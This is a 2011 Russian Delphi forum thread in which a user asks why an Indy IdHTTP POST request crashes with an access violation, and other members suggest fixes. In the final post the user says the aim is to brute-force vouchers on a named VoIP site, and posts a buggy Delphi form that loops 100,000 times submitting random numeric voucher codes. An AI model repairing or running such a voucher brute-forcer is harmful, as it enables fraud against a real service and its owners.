Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Работа с сетью в Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 29.08.2011, 20:36   #1
jetei
Пользователь
 
Регистрация: 29.08.2011
Сообщений: 24
Стрелка Проблема рост запроса.

Помогите пожалуйста с кодом:
Код:
 begin
PostData.Add('name=jetei');
PostData.Add('pass=mypass');
try
html:=IdHTTP1.Post('http://www.evaphone.ru',PostData);
PostData.Free;
except
end;
После запуска приложения вылетает ошибка "Access violation at adress 0045ab27"
Что ето может быть?Может я не правильно настроил IdHTTP?
jetei вне форума Ответить с цитированием
Старый 29.08.2011, 20:49   #2
mss
Заблокирован
 
Регистрация: 27.05.2010
Сообщений: 1,099
По умолчанию

Код:
PostData := TStringList.Create; // !!!!!!!!!!!!!!!!!!!!!!!!!!!
try
  PostData.Add('name=jetei');
  PostData.Add('pass=mypass');
  html:=IdHTTP1.Post('http://www.evaphone.ru',PostData);
finally
  PostData.Free;
end;
mss вне форума Ответить с цитированием
Старый 29.08.2011, 21:00   #3
jetei
Пользователь
 
Регистрация: 29.08.2011
Сообщений: 24
По умолчанию

Цитата:
Сообщение от mss Посмотреть сообщение
Код:
PostData := TStringList.Create; // !!!!!!!!!!!!!!!!!!!!!!!!!!!
Спс, но ошибка та же
jetei вне форума Ответить с цитированием
Старый 29.08.2011, 21:36   #4
Arsenx777
Delphi, c++, php
Форумчанин
 
Аватар для Arsenx777
 
Регистрация: 14.03.2011
Сообщений: 288
По умолчанию

Эта ошибка вряд ли из-за idhtt! - Нарушение доступа по адресу 0045ab27

Как вы пытаетесь сделать post запрос, если в html коде нету таких тегов с названием (name=pass и name=name) темболее которые отправляются методом пост ?
Мудр тот, кто знает нужное, а не многое.

Arsenx777 вне форума Ответить с цитированием
Старый 29.08.2011, 22:11   #5
jetei
Пользователь
 
Регистрация: 29.08.2011
Сообщений: 24
По умолчанию

Ето пример. Сайт наполовину построен на JavaScript, и авторизацыя проходит через
Код:
 <div id='footer-member'></div>
. Етот код содержить тело сайта. Если посмотреть через "Проинспектировать елемент" (в опере), то мы увидим
Код:
<input type="text" size="20" autocomplete="off" id="ext-comp-1052" name="name" class=" x-form-text x-form-field wv-common-input-textfield x-form-focus" style="width: 202px"/>
А вот что выше:
Код:
<form class="x-panel-body x-panel-body-noheader x-panel-body-noborder x-form x-form-element" method="POST" id="ext-gen13" style="height: 211px; width: 228px">

Последний раз редактировалось jetei; 29.08.2011 в 22:13. Причина: Ошибки
jetei вне форума Ответить с цитированием
Старый 30.08.2011, 11:40   #6
Arsenx777
Delphi, c++, php
Форумчанин
 
Аватар для Arsenx777
 
Регистрация: 14.03.2011
Сообщений: 288
По умолчанию

Если вы пытаетесь произвести вход в систему, то атрибут "name" у тега "<input" для логина и для пароли имеет другие значения!
Мудр тот, кто знает нужное, а не многое.

Arsenx777 вне форума Ответить с цитированием
Старый 30.08.2011, 14:55   #7
designer999
Форумчанин
 
Регистрация: 16.02.2010
Сообщений: 187
По умолчанию

вы негде во время исполнения программы не сделали IdHTTP1.free; ?)
designer999 вне форума Ответить с цитированием
Старый 30.08.2011, 15:00   #8
Пепел Феникса
Старожил
 
Аватар для Пепел Феникса
 
Регистрация: 28.01.2009
Сообщений: 21,000
По умолчанию

Цитата:
вы негде во время исполнения программы не сделали IdHTTP1.free; ?)
компоненты имеющие Owner(все кинутые в дизайне имеют его), явно удалять не нужно(исключения когда его надо удалить раньше чем Owner)
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел.
Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите.
Пепел Феникса вне форума Ответить с цитированием
Старый 30.08.2011, 18:15   #9
designer999
Форумчанин
 
Регистрация: 16.02.2010
Сообщений: 187
По умолчанию

я не это имел введу, например если он использовал другую процедуру, и освободил память от IdHTTP, а во второй процедуре пытается сделать Пост запрос))
designer999 вне форума Ответить с цитированием
Старый 30.08.2011, 20:09   #10
jetei
Пользователь
 
Регистрация: 29.08.2011
Сообщений: 24
По умолчанию

Вообще суть не в авторизацыи. Я хочу попробывать зделать брут вауЧеров.
Код:
unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, IdBaseComponent, IdAntiFreezeBase,
  IdAntiFreeze, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP;

type
  TForm1 = class(TForm)
    IdAntiFreeze1: TIdAntiFreeze;
    Button2: TButton;
    IdHTTP1: TIdHTTP;
     procedure Button2Click(Sender: TObject);
      procedure FormCreate(Sender: TObject);
     private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
  Login, Pass: TStrings;
l, p, k: Integer;
PostData:TStringList;
post:WideString;

implementation

{$R *.dfm}

function RandomPassword(PLen: Integer): string;
 var
   str: string;
 begin
   Randomize;
  str    := '1234567890';
   Result := '';
   repeat
     Result := Result + str[Random(Length(str)) + 1];
   until (Length(Result) = PLen)
 end;


procedure TForm1.Button2Click(Sender: TObject);
begin
Randomize;
k:=  12 + Random(15);
for p:=0 to 99999 do
begin
PostData.Add('w-voucher-code=RandomPassword(k)');
try
post:=IdHTTP1.Post('http://www.evaphone.ru',PostData);
PostData.clear;
except
end;

end;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
PostData:=TStringList.Create;
end;
end.

Последний раз редактировалось jetei; 30.08.2011 в 20:11.
jetei вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблема с выполнением запроса к БД AgentSmit PHP 2 14.04.2011 02:13
вычислить рост студентов (Delphi) belkooo Помощь студентам 1 19.12.2010 22:46
Задача про рост студентов filimon_ok Помощь студентам 5 09.12.2010 22:41
На Delphi показать рост растения Lapered Помощь студентам 1 30.05.2009 19:13
Проблема выполнения запроса Рустам PHP 2 31.05.2008 15:15